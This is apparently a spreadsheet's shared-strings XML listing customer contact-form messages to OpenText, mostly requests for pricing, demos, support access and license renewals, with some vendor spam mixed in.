    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
_x000D_
ich evaluiere eine Lösung für Application Retirement und Datenarchivierung in unserer Firma. Bitte können Sie mir Informationen über Ihr Archivierungsprodukt und Lizenzmodelle/Preise zukommen lassen?_x000D_
_x000D_
Wir möchten Daten von verschiedenen Applikationen archivieren, z.B. ERP, Zeiterfassung, Sharepoint…_x000D_
_x000D_
Ich freue mich auf eine Rückmeldung von Ihnen._x000D_
</t>
  </si>
  <si>
    <t>Cause i need one for my direct deposit</t>
  </si>
  <si>
    <t>Please can I have a support account registered._x000D_
_x000D_
Many Thanks_x000D_
_x000D_
Paul Eggleton_x000D_
Tech. Architect,  Spire Healthcare</t>
  </si>
  <si>
    <t>I needs a reddot card to same my money</t>
  </si>
  <si>
    <t xml:space="preserve">Gentileza entrar em contato para maiores informações sobre o OpenText e possibilidade de apresentação para a Prefeitura Municipal de Belo Horizonte._x000D_
_x000D_
_x000D_
​Aguardo seu retorno._x000D_
</t>
  </si>
  <si>
    <t>There is a credit of 341.51 on the 7.31.17 invoice.  Can you please provide details of what fax lines were disconnected to form this credit as we need to verify prior to taking the credit?</t>
  </si>
  <si>
    <t xml:space="preserve">Dear OpenText,_x000D_
_x000D_
We are running in our company OpenText Content Server 10 with external storage._x000D_
I have read that there are tools too manage backups and restores of external storage solution. _x000D_
Can you help me understand which tools is it and how/where to get/download it?_x000D_
_x000D_
Right now we backup the SQL and the file system partitions separately and it's no good._x000D_
_x000D_
Any best practice for this issue?_x000D_
_x000D_
Best regards,_x000D_
Ben </t>
  </si>
  <si>
    <t>Does OpenText have part numbers for prepackaged configuration and consulting services?</t>
  </si>
  <si>
    <t>I need to understand the Support Life-cycle Dates of your products. Currently, you display the in service date and the Sustaining Date (which requires Extended Support). But I need to know the end date without extended support for all of the product/versions that we currently have. Can you provide me with the Out of Service Date for the following: _x000D_
Documentum Content Server v7.3_x000D_
Documentum Webtop v6.7_x000D_
Documentum Web Publisher v6.5 SP7_x000D_
Documentum Captiva Capture v7.6_x000D_
_x000D_
And, could you also consider adding this information to your site?_x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>Looking for centralized fax solution for Medical Associates Clinic</t>
  </si>
  <si>
    <t>OpenText RightFax to Email</t>
  </si>
  <si>
    <t>Hello there,_x000D_
I have a lot of question for answered. First let me tell you the matter. Suppose I have a website where I do upload pdf and videos which can only be access able by my paid users. Now there is a problem. When a registered users access to the files s/he will download the file for himself/herself, it is far possible that s/he may share that files via shareit / cloud / email or via anything to her/his friends. Thus his/her friends did not have to pay for the files. Let me say another example, Say there is a group consist of 500 members. One of them is a paid member of my site and bought a pdf book. Now he / she share that pdf / video to the group, ultimately 499 member will enjoy the files in free. If there any tools by which I can decrypt the files, which can only readable in that one device who paid for the file. I mean the fill be corrupted or like this if anyone share it to other person by online / offline. I do apologies for my poor English and if I did not make  you clear please email me again. If you have any suggestion for this I will happy. Thank you</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
Hutchinson Sealing Systems aux US travaille avec la société ANX sur le déploiement de Teamcenter, pourriez-vous me contacter pour le déploiement en France, formation, support, éventuellement développement autours de Teamcenter._x000D_
Merci d'avance pour votre aide.</t>
  </si>
  <si>
    <t>We currently have a network lic. for Brava.  We are retiring our old lic. server and moving all our lic. to a new server.  I would like to get a new lic. file for Brava so that I can migrate Brava to the new lic. server.</t>
  </si>
  <si>
    <t>Hi there!_x000D_
_x000D_
I am curious to find out more about Magellan and potential integration into our database._x000D_
_x000D_
Thanks!_x000D_
_x000D_
Ana</t>
  </si>
  <si>
    <t>We need the part #, Description to order additional named user licenses so that we can bid it out on NYS OGS contract to the resellers.  We recently issued a PO to Dell to renew our existing maintenance for term 11/1/17-10/31/17. Can we coterm the new licenses to expire with our existing maintenace.  If the PO for the new licenses is awarded to another reseller other than Dell, is that an issue (is the maintenance "pass-through" so that Open Text is supporting us)?</t>
  </si>
  <si>
    <t>To understand the pricing structure and the difference between Documentum and SharePoint. We are an engineering, project &amp; construction management company. In the future we will have projects where we will need at least 25 users, up to 100 users on the system. Using such programs as autocad, sagepay and SAP. Could you tell me the different pricing structures you have? (e.g. 25, 50, 100 and 200 users). This is quite urgent so a swift response would be grateful.</t>
  </si>
  <si>
    <t>Looking for an ECM product for next year.  Would like to start the discussion with OpenText as a possible solution.</t>
  </si>
  <si>
    <t>I'd like to receive access to the MySupport portal to acquire information and software related to StreamServe.</t>
  </si>
  <si>
    <t>Hi! My name is Ryan Johnson, I’m a Business Development manager at ArchiCGI company. I’d like to present you 3D Visualization services as a key to making your project presentations truly unforgettable, and the workflow - faster and smoother than ever before._x000D_
_x000D_
Find out how 3D can benefit you: https://archicgi.com</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
i'm contacting you about accessing OpenText MySupport. I'm working for delaware. My contact is Janssens, Lesly._x000D_
_x000D_
Is it possible to get access?_x000D_
_x000D_
Thanks,_x000D_
Regards,_x000D_
Victor Talvaz</t>
  </si>
  <si>
    <t>Interested in Bot product for knowledge management software we have.</t>
  </si>
  <si>
    <t>enquiry for eRoom</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I contacted you more than week ago with question if there is available documentum developer edition for version 7.3. By today I had no answer from your site. We have potential customer that asks us for Documentum server and if it suitable for him._x000D_
_x000D_
We want deploy documentum test server for internal use to check possibilities integration documentum features into his product. I found developer license for version 7.2 (https://community.emc.com/community/edn/documentum/blog/2015/11/21/documentum-72-developer-edition) but the link there is broken. As I know the latest version is 7.3. So my question is if exists developer license for documentum v. 7.3._x000D_
_x000D_
Thanks for response._x000D_
_x000D_
- Laco.</t>
  </si>
  <si>
    <t>_x000D_
Dear Responsible,_x000D_
 _x000D_
We would like to offer you 11.000+ IT executive enduser database, 3.000 single company having IT needs and budgets, includes (CIOs, CTOs, Datacenter &amp; Infra &amp; Disaster Recovery Managers &amp; IT Security Executives etc) from below sectors in Turkey._x000D_
_x000D_
Our database includes name, position, company, company email and phone even mobile_x000D_
We believe you can transform your solutions into new business opportunuties through email campaigns and marketing promotions by our database._x000D_
_x000D_
We can discuss for further steps, if you are interested, please let us know._x000D_
 _x000D_
Health Care_x000D_
Business Services - eTrade_x000D_
Government &amp; Public Services_x000D_
Business Services_x000D_
Health Care_x000D_
Banking, Finance, Insurance_x000D_
Wholesale &amp; Retail Trading_x000D_
Manufacturing_x000D_
Education_x000D_
Pharmaceutical_x000D_
Agriculture, Construction, Mining_x000D_
Education - k12_x000D_
Municipalities_x000D_
Business Services - NGO_x000D_
Oil, Gas &amp; Energy_x000D_
Manufacturing - Textile_x000D_
Group Companies_x000D_
Utilities_x000D_
Group Companies - IT_x000D_
Media_x000D_
Business Services - Travel_x000D_
Telecommunications_x000D_
Manufacturing - FMCG_x000D_
Transportation_x000D_
Manufacturing - Automotive_x000D_
Transportation - Logistics_x000D_
Business Services - F&amp;B_x000D_
 _x000D_
IT_x000D_
Transportation - Airlines_x000D_
Business Services - Hospitality_x000D_
Group Companies_x000D_
 _x000D_
 _x000D_
Best Regards,_x000D_
_x000D_
Meric Tahan_x000D_
Free Lance Database Builder_x000D_
+90534231955</t>
  </si>
  <si>
    <t>Want to know if there is a technical support team in India for Exceed on demand product from opentext</t>
  </si>
  <si>
    <t>Once I have access to 'My support' will I be able to create other users, which will give access to downloads etc?</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour,_x000D_
Je souhaiterais organiser aves vous une Webex afin que vous me montriez votre solution et que je puisse évaluer en quoi elle pourrait répondre à notre besoin._x000D_
Je vous fournirai auparavant une spécification très synthétique._x000D_
Dans l’attente d’une réponse de votre part,_x000D_
Bien cordialement,_x000D_
</t>
  </si>
  <si>
    <t>Wham to know more about it</t>
  </si>
  <si>
    <t>Vill komma i kontakt med någon angående försäljning Teleform.</t>
  </si>
  <si>
    <t>We are looking for a solution to help integrate sharepoint 2016 with SAP. We want to be able to create a self service site on SharePoint, which will utilize SAP data for business processes.</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
Please send us a quote for renewing our 20 DM Client licenses and 1 DM server license support._x000D_
Warm Regards,_x000D_
Priya Baer</t>
  </si>
  <si>
    <t>I am not able to access the my support website to create a ticket related to the Documentum product and I could not even request for the access.</t>
  </si>
  <si>
    <t>Hi,_x000D_
Wondering if you could provide pricing for Fax Cloud service?_x000D_
Looking at inbound fax2email and outbound email2fax._x000D_
Also, can we retain our existing Fax Service Numbers, what is required to change over?_x000D_
Thanks,_x000D_
Simon</t>
  </si>
  <si>
    <t>looking tor a fax app for our web site that could send faxes to people in the database.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear all,_x000D_
I would like to subscribe for the BIRT CRM software in one of our subsidiaries in Brazil that is internalizing CRM services from a marketing agency that uses your licenses. As our internal compliance rules, our subsidiaries should establish contracts directly with software providers and not through intermediaries, I would like to request a subscription proposal from OpenText (BIRT software)._x000D_
_x000D_
As spoken with your local (brazil) offices they do not have this product in their portfolio so advising us to reach international sales team directly._x000D_
_x000D_
My Best Regards,_x000D_
Paula G_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>need intranet. via mw</t>
  </si>
  <si>
    <t xml:space="preserve">Product/Sales Demo Request </t>
  </si>
  <si>
    <t xml:space="preserve">I would like to install Demo version of OpenText Exstream software. Please let me know details about it. </t>
  </si>
  <si>
    <t>For administrational reasons, I would like to request my certification receipt of the Livelink Certified Consultant Bootcamp training from October 2005, attended when I worked at Siemens in The Netherlands. Many thanks.</t>
  </si>
  <si>
    <t>About Internship jobs..</t>
  </si>
  <si>
    <t>Personalmatter</t>
  </si>
  <si>
    <t>Hi there! I'm contacting you to know if you have some documentation about the localization features that the WCMS provides. To be more specific, I would like to know if it's possible to export and import content for localization, and which format of file it uses. We are a localization services provider and we are interested in having more information about your CMS, and we are evaluation to build a connector to integrate with your platform._x000D_
_x000D_
Looking forward to know more about your CMS._x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>We are a financial services company.  We get data such as fee amount info, loan interest rate info, savings deposit info, from various banking institutions on a weekly or monthly basis.  We get the data from the bank on a spreadsheet sometimes and then we import it into our DB2 database.  Can your ETL package do this?</t>
  </si>
  <si>
    <t>Requesting quote and more information. Establishing EDI connection with Kohls for 231 UPCs created through GS1._x000D_
_x000D_
Thank you,_x000D_
Dan</t>
  </si>
  <si>
    <t>Hello,_x000D_
 I am interested in obtaining the ECCN for the Open Text Imaging Viewer that you produce._x000D_
_x000D_
Thank you,_x000D_
Kat Campbell</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I hope this message finds you well._x000D_
_x000D_
I was going through your website and I'm curious if you would be open to our database of Salesforce users for your product specific marketing campaigns and lead generation initiative.._x000D_
 _x000D_
We have an exclusive database of Salesforce users contacts with 100% 3rd party opt-in emails._x000D_
_x000D_
Should you be targeting a different target audience, please let me know._x000D_
 _x000D_
Should this be interest to you, please email me back ._x000D_
 _x000D_
Appreciate for your time and I definitely will look forward for an opportunity to work with you._x000D_
 _x000D_
Regards,_x000D_
Cliff Johnson _x000D_
</t>
  </si>
  <si>
    <t>Since we are an industrial software developer company and we want to evaluate the possibility of adding your OpenText Capture Center product into a project to resell it to our customer, can you please indicate me your reseller price architecture that you can offer us ?_x000D_
_x000D_
Thank you in advance</t>
  </si>
  <si>
    <t>I need to handle a Documentum renewal for Toyota - our contact previously at emc/dell has gone. please advise asap. thanks Julian</t>
  </si>
  <si>
    <t xml:space="preserve">We have an opentext product  (Bluebird) that is decades old for our electronic employee record / file management, and we're interested in upgrading and I am interested in possible opentext solutions. </t>
  </si>
  <si>
    <t>My co-worker has requested I use a link to pay for renewal of Open Text Software Maintenance Program subscription.  I have had no success whatsoever in accessing it so I can pay that renewal.  Please contact me so I can pay with a credit card.  The link is: https://support.opentext.com/rr-RC222848-25047  .  This does not take me to a screen where I can pay.</t>
  </si>
  <si>
    <t xml:space="preserve">Need demo license. It would not contact the license server online when requesting evaluation license. </t>
  </si>
  <si>
    <t>Hello - I don't know if we already have a rep. at Open Text.  I would like to talk to someone about setting up a demo for us of your full records management ECM product. Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello_x000D_
Var Group is a System integrator, for the activities to Leonardo/Finmeccanica Rome of Sourcing and Procurement, I ask you the quotation for to renew the licenses of LEONARDO MW LTD (previously Selex),_x000D_
  _x000D_
The details of the renewal that you find the following: _x000D_
_x000D_
Previous  PO 4500565810 – of CSC Computer Sciences Ltd._x000D_
Qty : 1_x000D_
Product :  Open Test SSH - Secure Shell_x000D_
_x000D_
Qty : 1_x000D_
Product :  Open Text Exceed_x000D_
_x000D_
End user_x000D_
Leonardo MW Ltd_x000D_
Sigma House, Christopher Martin Road, _x000D_
Basildon, Essex, SS14 3EL._x000D_
 _x000D_
below our data for the quote:_x000D_
VAR Group S.p.A. _x000D_
Via Piovola 138  50053 Empoli (FI) Italy_x000D_
Tel. 0571 9988  Fax 0571 993366 _x000D_
Vat: IT03301640482_x000D_
_x000D_
I ask you to include in your quote what I write here: _x000D_
•	I kindly ask you to state in the quotation if, for the renewal, the delivery of any electronic (ex. new license key) and/or physical media is needed or not". _x000D_
•	the period of support &amp; Maintenance coverage for these Licences _x000D_
_x000D_
Do you provide any discount to resellers?_x000D_
 _x000D_
Can you send me a quote?_x000D_
 _x000D_
 _x000D_
I thank you in advance for your prompt response._x000D_
 _x000D_
Best regards_x000D_
 _x000D_
 _x000D_
 _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello _x000D_
Var Group is a System integrator, for the activities to Leonardo/Finmeccanica Rome of Sourcing and Procurement, I ask you the quotation for to renew the licenses, of LEONARDO MW LTD (previously Selex),_x000D_
  _x000D_
The details of the renewal that you find the following: _x000D_
_x000D_
Qty : 1_x000D_
Product :  Open Text Exceed_x000D_
_x000D_
end user:_x000D_
Leonardo MW Ltd_x000D_
Sigma House, Christopher Martin Road, _x000D_
Basildon, Essex, SS14 3EL._x000D_
_x000D_
below our data for the quote:_x000D_
VAR Group S.p.A. _x000D_
Via Piovola 138  50053 Empoli (FI) Italy_x000D_
Tel. 0571 9988  Fax 0571 993366 _x000D_
Vat: IT03301640482_x000D_
_x000D_
I ask you to include in your quote what I write here: _x000D_
•	I kindly ask you to state in the quotation if, for the renewal, the delivery of any electronic (ex. new license key) and/or physical media is needed or not". _x000D_
•	the period of support &amp; Maintenance coverage for these Licences _x000D_
_x000D_
Do you provide any discount to resellers?_x000D_
 _x000D_
Can you send me a quote?_x000D_
 _x000D_
 _x000D_
I thank you in advance for your prompt response._x000D_
 _x000D_
Best regards_x000D_
 _x000D_
</t>
  </si>
  <si>
    <t>Need to know the price for brava free dgf viewer to be used by two persons. They just need to see and print (eihter paper of pdf format)</t>
  </si>
  <si>
    <t>Good afternon,_x000D_
_x000D_
We are a company in the wine industry, and we have SAP about 6 year. _x000D_
We are looking for an FI solution integrate our vendors invoices automatically by reading PDF, using OCR._x000D_
Do you have any solution or any product to our SAP._x000D_
_x000D_
We will be waiting for an answer._x000D_
_x000D_
Best regards,_x000D_
Bruno Queirós</t>
  </si>
  <si>
    <t xml:space="preserve">We wish to license RecoStar for inclusion in our own software solutions.  Kindly put me in touch with your partner manager to establish a partnering contract and get pricing for RecoStar.   Thank you!   </t>
  </si>
  <si>
    <t>HI_x000D_
I am a new vendor with Nordstrom and need EDI for the following communication. _x000D_
 _x000D_
810 - Invoice_x000D_
832 - UPC catalog with OpenText or InterTrade_x000D_
850 - Purchase Order_x000D_
856 - Advance Ship Notice with related GS1-128 label_x000D_
997 - Functional Acknowledgement_x000D_
 _x000D_
If you could let me know if you charge monthly or per transaction as well as what this cost is I would greatly appreciate it. _x000D_
Best_x000D_
Cynthia</t>
  </si>
  <si>
    <t>do you have a .msi package of opentext enterprise scan software that I can download to push to multiple PC's?</t>
  </si>
  <si>
    <t>Need support portal access. I recenetly took over as the system analyst for our Rightfax system and need access to the support portal to get more information of upgrading to 16.2. Including release notes and software download.</t>
  </si>
  <si>
    <t xml:space="preserve">Requesting a demo/consultation at our offices for a changeover from current document system, Enovia. </t>
  </si>
  <si>
    <t xml:space="preserve">unable to renew support online, Error Page_x000D_
_x000D_
Application has encountered an error._x000D_
</t>
  </si>
  <si>
    <t>We currently have a faxserver with a opentext gateway, we count 50,000 faxes (in/out) a year more that 300,000 pages._x000D_
We would like to have information, cost and features of using the OpenText cloud option._x000D_
_x000D_
You can contact me at (801)300-3007_x000D_
Thank you_x000D_
_x000D_
Pedro Zepeda</t>
  </si>
  <si>
    <t>Need quote for Command Center and other information such as Spark Post etc.</t>
  </si>
  <si>
    <t>Interested in a CMS options for your clients websites.</t>
  </si>
  <si>
    <t>Can you tell me possibilities for training on streamserve fundamentals, v5.6.2? For 1 individual or for 5 people. Thanks Martin</t>
  </si>
  <si>
    <t>I have a few questions about your platform and how this could possibly work for my firm. It would be great to discuss these over the phone. _x000D_
_x000D_
Alexa</t>
  </si>
  <si>
    <t xml:space="preserve">We want to know the price for your OpenText Information Hub solution. We are looking for an intelligent reporting tools for our Liferay DXP Portal. We currently have 3,000 users that will be potential report consumers. Thanks for your help and we will waiting for the requested information. </t>
  </si>
  <si>
    <t>Unser Unternehmen hat ein Projekt bei Leica-Camera in Wetzlar. Projektleiter ist Herr Lutz. Wir wollen eine Verknüpfung herstellen mit Dokumenten, die im OpenText-Archiv abgelegt sind. Seitens des Fachbereiches von Leica-Camera, Frau Madeiski, sind wir gebeten worden, zu Ihnen zwecks Realisierung Kontakt aufzunehmen. Über eine Rückruf zur Besprechung der erforderlich Aktivitäten bitte ich um Ihren Rückruf._x000D_
Vielen Dank, Ude Schmidt_x000D_
www.litreca.com</t>
  </si>
  <si>
    <t>We need support service from Opentext, the same we had with EMC DELL for Documentum.</t>
  </si>
  <si>
    <t>ciao OpenText, _x000D_
_x000D_
we are a multinational System Integrator (Unified Communication / Call Center field, Avaya partner) currently working on an opportunity in Italy (Milan), our client wants to add Fax server capability to the existing Avaya IP Office PBX, kindly put me in contact with the suitable OpenText account, Thanks_x000D_
Paolo</t>
  </si>
  <si>
    <t>I created a user account for your site to access this URL http://developer.actuate.com/community/forum/index.php?/topic/24196-mavenizing-birt-371/_x000D_
and not only did I not receive an account confirmation email, but I can no longer access ANY page on http://developer.actuate.com/community/_x000D_
Please assist promptly, I am currently working on a project using BIRT and the afforementioned page may have useful information._x000D_
_x000D_
Regards_x000D_
Justin Morris</t>
  </si>
  <si>
    <t>How do we make our product part of the OpenText brand family?_x000D_
_x000D_
We have developed a strategy execution and performance/operations  management software that is innovative, flexible and modern.</t>
  </si>
  <si>
    <t>PLEASE STOP SENDING FAX CALLS TO THIS NUMBER-IT IS A HOSPITAL AND IT TIES UP MY ONE LINE FOR HOURS WACH MORNING</t>
  </si>
  <si>
    <t>We are users of Metastorm BPM that has been in place at our sites since 2008. The Council has an IT Alliance contract with NorthgatePS so I am not sure if support contracts lie with Hartlepool BC or NorthgatePS._x000D_
I have registered for access to Support and would like access granted. In the meantime can someone please confirm the technical specs for Metastorm v9.1._x000D_
The current installation on a Windows 2005 server needs to be migrated to a minimum of Windows 2008, preferably Windows 2012 for PSN purposes and we would like details of how to proceed on the basis that we still wish to use Metastorm, or Opentext MBPM as it now appears to be branded._x000D_
Many Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for a document management software for our real estate project in Islamabad, Pakistan. Please quote your price for LiveLink and Documentum systems. General details are as below:_x000D_
Company business Real Estate _x000D_
System type - Cloud based _x000D_
Number of users - 50 (and may expand to 100 in future)_x000D_
Location of office - Islamabad, Pakistan._x000D_
Services required - EDMS design and implementation, workflows, testing and commissioning, trainings and support services_x000D_
_x000D_
If you need any further details, please let me know._x000D_
_x000D_
Thanks </t>
  </si>
  <si>
    <t xml:space="preserve">I would like to find out the requirements of becoming a member ._x000D_
_x000D_
Regards </t>
  </si>
  <si>
    <t>HI,_x000D_
    I am K. Chandra sekhar with hands on 2.6 years experience in wordpress, javascript, jquery, mysql, php, bootstrap, material design, html5, css3 In Aptagrim Consulting LLP Hyderabad._x000D_
_x000D_
Thanks &amp; Regards,_x000D_
K. Chandra sekhar.</t>
  </si>
  <si>
    <t>To become a Partner/Reseller</t>
  </si>
  <si>
    <t>Hi_x000D_
Could you provide an estimate of cost please? Also, is there a student version._x000D_
Many thanks_x000D_
_x000D_
Adrian</t>
  </si>
  <si>
    <t>Inquiry:_x000D_
Are you offering an online training for Right Fax 10.5 version (Installation and Maintenance)</t>
  </si>
  <si>
    <t>Exceed onDemand client for iOS devices says it's not compatible with iOS 11 and needs updating.  Do you have any plans to update it?_x000D_
_x000D_
Many thanks,_x000D_
_x000D_
Rich Bouchard</t>
  </si>
  <si>
    <t>I was threatened by an Opentext employee and was called numerous racial terms in Tucson, AZ. I would like someone to contact me immediately from the human resource department.</t>
  </si>
  <si>
    <t>When sending a fax from our EMR system we seem to not be able to send in a bulk but instead individually. Is there a setting that can change this?</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We are evaluating platforms to replace our existing Intranet and wanted to discuss solutions offered by Opentext. _x000D_
Thanks,_x000D_
Rob</t>
  </si>
  <si>
    <t xml:space="preserve">Looking to speak to the Event Planner regarding supplying Clean Corporate Quality Entertainment for your Special Events!_x000D_
www.markcrocker.ca_x000D_
ca.linkedin.com/in/mcrockercorporateentertainer/_x000D_
https://twitter.com/Crockoflaffs_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Checking to see if the Xerox Color 70 printer is a supported device for Right Fax.  Any information is appreciated. </t>
  </si>
  <si>
    <t>Need access to "My Support"</t>
  </si>
  <si>
    <t>Being Support resource need support access for download softwares</t>
  </si>
  <si>
    <t>We are moving to ResWare software, and they have integrated with your service.  We would like to have additional information.  We would also want to keep our current fax number.</t>
  </si>
  <si>
    <t>Hi._x000D_
_x000D_
I’m looking for a company to service RailTerm’s needs in sending faxes (step #1) and possibility receiving faxes (step #2). For now, please focus of step #1 but be advised that step #2 will be considered as a future project._x000D_
RailTerm is a company operating in the Rail industry, and is dispatching trains all over North-America. One of the requirements that we have is that each day before midnight (EST), we must fax a bulletin to each railway with temporary rule changes, speed limit changes or any change that could impact the hundreds or thousands of miles of train tracks our customers operate. Since we have multiple customers, and each customer can have multiple fax numbers, we are sending hundreds (maybe even thousands) of faxes every day. Currently, our fax server has multiple architecture issues:_x000D_
1)	Single point of failure without any backup._x000D_
2)	Running a very old version of Linux. _x000D_
3)	Limited to sending one fax at a time. _x000D_
4)	Doesn’t work with our disaster recover office, because it’s physical server._x000D_
5)	Doesn’t warn us if a phone number is no longer valid._x000D_
Our Bulletin application can send emails to end-users (example: stremblay@railterm.com) and to fax lines using the 15555555555@fax.railterm.com SMTP address. The fax itself is a PDF in attachment. For this setup to work successfully, our application is configured to send emails to an intermediate SMTP server, which is a simple Windows SMTP Server. The SMTP server does MX Queries to our internal DNS Server to forward the email to the correct SMTP server, either Office 365 servers (RailTerm’s mail server) or the Linux Fax Server. Here is a screenshot of railterm.com’s internal DNS Zone for MX Records._x000D_
_x000D_
 _x000D_
_x000D_
Here is a diagram of our current setup._x000D_
 _x000D_
 _x000D_
_x000D_
We are looking forward to changing this setup to migrate our Fax Server to the Cloud, using a Cloud Fax Service Provider. Using a Cloud Fax Service Provider resolves 4 of the 5 issues we have right now: No more single point of failure, running r</t>
  </si>
  <si>
    <t>Need a title released , says it has a lien _x000D_
but it's paid of. Trying to get a lost title</t>
  </si>
  <si>
    <t xml:space="preserve">Buenas Tardes, hemos recibido una carta haciendo referencia a un anuncio importante sobre una actualización de su sistema ERP. nuestra incertidumbre es que nosotros (MOLINOS &amp; CIA SA) no tenemos servicios con ustedes por lo cual no entendemos porque nos notifican a nuestra dirección, por favor su apoyo en actualizar su información. gracias </t>
  </si>
  <si>
    <t>Good afternoon, I am writing to follow up on a proposal for charitable funding from OpenText in support of the Teacher Enrichment Program with a $15,000 gift to the professional development of urban and rural middle and high school science teachers to impact students in schools in multiple OpenText locations: Los Angeles, San Diego, and San Francisco, California; Austin, Dallas, and San Antonio, Texas; and Arlington, Virginia._x000D_
_x000D_
The proposal is newly submitted. I wanted to follow up and offer to provide additional information, if needed._x000D_
Thank you,_x000D_
Charles Farmer</t>
  </si>
  <si>
    <t>Need to know what would be required to reinstate our support contract._x000D_
enduser: EU00167247</t>
  </si>
  <si>
    <t>I am inquiring about OpenText software for our utility which is an SMB consisting of approximately 300 employees serving 190,000 customers. Open Text also has State of Washington Contract pricing._x000D_
We have an existing document archiving system but are looking for a more robust option that can integrate with SharePoint and ESRI/GIS. We also would like to be able to scan documents into our system and create workflows for them._x000D_
I would like to schedule a meeting with you to discuss our requirements and how OpenText can fill our needs.</t>
  </si>
  <si>
    <t>We want to migrate our FAX services to a Cloud based solution._x000D_
We want to do this within the next 3 to 4 months so we need to start the process now.</t>
  </si>
  <si>
    <t>When we use Enterprise Connect to move email files into LiveLink the file name is changed.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello ..., I am Funke Solaja, Head of Marketing Operations for PLES IT Services. I will like to inform you that PLES IT Services will love to be a vendor to your company in rendering onsite IT services/ support to your clients in Nigeria, Republic of Benin, Cameroon, Ghana, Togo, Ivory Coast and other West Africa countries. Our profile records over the years has been a 100% pass mark with no complains from our clients. You can email me on: solaja.funke@plesng.com or visit www.plesng.com_x000D_
</t>
  </si>
  <si>
    <t>Hi_x000D_
I would like to know what is the latest version of Teleform and what is the price. I have an older version (10.7) and I would like to upgrade._x000D_
_x000D_
Thank you_x000D_
Emmanuelle</t>
  </si>
  <si>
    <t xml:space="preserve">Allied Academies Ltd Conferences invites all the participants from all over the world to attend “10th World Congress on dementia” Slated during May 25-26,2018 at New York, USA which includes prompt keynote presentations, special sessions, workshops, symposiums, oral talks, poster presentations and exhibitions._x000D_
For more details: http://dementia.alliedacademies.com/_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Interested in learning about your cloud fax solution for PetSmart. Email please.</t>
  </si>
  <si>
    <t>Get more info and possibly a demo of the solution you offer. Please contact me via email.</t>
  </si>
  <si>
    <t xml:space="preserve">Request to access documentum downloads and support_x000D_
This message is shown when I log in:_x000D_
_x000D_
No Access_x000D_
_x000D_
_x000D_
_x000D_
We're sorry, your account does not grant you access to this resource._x000D_
</t>
  </si>
  <si>
    <t>Looking to get budgetary pricing info.</t>
  </si>
  <si>
    <t>Einführung einer DMS</t>
  </si>
  <si>
    <t>Need access to Streamserve documentation (last version).</t>
  </si>
  <si>
    <t>Je souhaite vous soumettre une spécification de besoin, et voir à l'occasion d'une WEBEX que j'organiserai avec Outlook comment vous seriez susceptible d'y répondre._x000D_
Cordialement,</t>
  </si>
  <si>
    <t>Paper Less office enquiry. Pls contact on emergency basis.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
The new project manager at  Sanofi is willing to attend the 3-2015 course. Unfortunately the next scheduled date for the course (16Oct2017) does not fit with his agenda. _x000D_
Could you please let me know when the next session is scheduled?_x000D_
Or if it would be more realistic to consider an on-site training?_x000D_
Many thanks,_x000D_
Thierry </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I worked before two years on teamsite. I want use OpenText but i do not know to how can i._x000D_
Can you help me about this? _x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Good day,_x000D_
Who are the resellers of RightFax in South Africa?_x000D_
_x000D_
Thank you_x000D_
Kind regards_x000D_
_x000D_
Sonja_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wir interessieren uns für Ihre RPA Lösung und würden uns hier über einen Ansprechpartner inkl. Kontaktinformationen sehr freuen!</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour, nous utilisons encore une vielle version d'eroom et nbous avons quelques questions à vous poser concernant le support, les licences et la maintenance </t>
  </si>
  <si>
    <t>I need to supply to a Japanese customer to describe OpenText company profile information in USA not Corporate Waterloo.  I see office location but do not see what we do in USA. Can you supply  profile PDF that can be sent external? Thanks.</t>
  </si>
  <si>
    <t>Captiva Indexing error</t>
  </si>
  <si>
    <t>We are looking for a File Sharing &amp; Collaboration Solution, I think that OpenText could do also that. Have you some reseller in Italy, for a quick demo on-site (Milan)?_x000D_
Thank you very much.</t>
  </si>
  <si>
    <t>(Le Pays "France" est indiqué car je voudrais que ce mail soit traité par le bureau de Paris)_x000D_
Chers collègues,_x000D_
Pourriez-vous me contacter concernant le planning des formations OpenText à Paris?_x000D_
Je trouve assez étrange que lorque je téléphone à votre bureau de Paris, on me demande de contacter un bureau au Benelux afin de recevoir le nom d'une personne de contact ... à Paris ... _x000D_
N'y arrivant pas, je m'en remets à ce formulaire en ligne ..._x000D_
Merci d'avance,_x000D_
Très Cordialement,_x000D_
Alain Massart pour la société Flexso</t>
  </si>
  <si>
    <t>I can not download the patches for Quality Manager (I come back in a login screen) I have already spoken with mr Jim Bon from OpenText (Putten, Holland) and he advised me to inform you.</t>
  </si>
  <si>
    <t>Request for proposal: Xenos DSR upgrade from V3.2 to latest and to integrate to IBM FileNet P8.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi_x000D_
is this http://www.opentext.com/training/coursedetails.html?id=2322 (Reading, UK Opentext) training online or onsite ?_x000D_
_x000D_
I am interested to register for this one if it is online_x000D_
_x000D_
Thanks_x000D_
Moww_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I would like a sales demo of your reporting engine. </t>
  </si>
  <si>
    <t>Reaching out for more information regarding your ECM solutions on behalf of the marketing team at the Oracle Dyn GBU. Particularly interested in discussing the OpenText Media Manager that Oracle Corporate utilizes for creative assets and content, and if our GBU might be able to implement a similar solution. Would like to speak with your Oracle rep at your convenience. Thanks!</t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon,_x000D_
_x000D_
